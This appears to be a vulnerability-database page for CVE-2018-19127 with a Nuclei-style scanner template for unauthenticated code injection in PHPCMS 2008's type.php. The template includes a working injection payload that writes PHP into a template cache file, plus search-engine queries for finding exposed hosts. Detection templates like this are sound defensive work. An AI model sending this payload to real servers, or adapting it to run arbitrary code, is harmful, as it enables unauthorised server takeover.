| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2018-19127 | 22 Aug 202521:02 | – | circl | |
| PHPCMS Code Injection Vulnerability | 13 Nov 201800:00 | – | cnvd | |
| PHPCMS 2008 type.php Code Injection (CVE-2018-19127) | 27 Mar 201900:00 | – | checkpoint_advisories | |
| CVE-2018-19127 | 9 Nov 201812:00 | – | cve | |
| CVE-2018-19127 | 9 Nov 201812:00 | – | cvelist | |
| CVE-2018-19127 | 9 Nov 201812:29 | – | nvd | |
| CVE-2018-19127 | 9 Nov 201812:29 | – | osv | |
| Code injection | 9 Nov 201812:29 | – | prion | |
| VulnCheck KEV: CVE-2018-19127 | 4 Apr 201900:00 | – | vulncheck_kev |
id: CVE-2018-19127
info:
name: PHPCMS 2008 - Remote Code Execution via Template Injection
author: tomaquet18
severity: critical
description: |
PHPCMS 2008 suffers from an unauthenticated RCE via template injection in type.php, where attacker-supplied content is written into a PHP template cache file, which is then executable.
impact: |
Successful exploitation allows an unauthenticated attacker to achieve remote code execution on the server, potentially taking full control.
remediation: |
The vendor is unresponsive and PHPCMS 2008 is no longer maintained. Users are advised to stop using this software or restrict public access to it.
reference:
- https://github.com/ab1gale/phpcms-2008-CVE-2018-19127
- https://github.com/advisories/GHSA-p498-q357-m3p7
- https://nvd.nist.gov/vuln/detail/CVE-2018-19127
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-19127
epss-score: 0.20766
epss-percentile: 0.97228
cwe-id: CWE-94
cpe: cpe:2.3:a:phpcms:phpcms:2008:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: http.html:"Powered by phpcms"
fofa-query: body="Powered by phpcms"
vendor: phpcms
product: phpcms-2008
tags: cve,cve2018,phpcms,rce,ssti,vkev,vuln
flow: http(1) || http(2)
variables:
num: "999999999"
payload: "tag_(){};echo(md5({{num}}));{//../rss"
http:
- method: GET
path:
- "{{BaseURL}}/type.php?template={{payload}}"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "value=\"picture", "phpcms", "{{md5(num)}}")'
condition: and
internal: true
- method: GET
path:
- "{{BaseURL}}/data/cache_template/rss.tpl.php"
matchers:
- type: word
words:
- "{{md5(num)}}"
# digest: 490a00463044022031e2bcd2694b2962d1a829b27da35526068d87970b1a48554dcd3c9b8e3c204302202b213df81b1cde212cabf8df50ef8568af668cc5db86e8ea8f551bebf2fe17ed:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation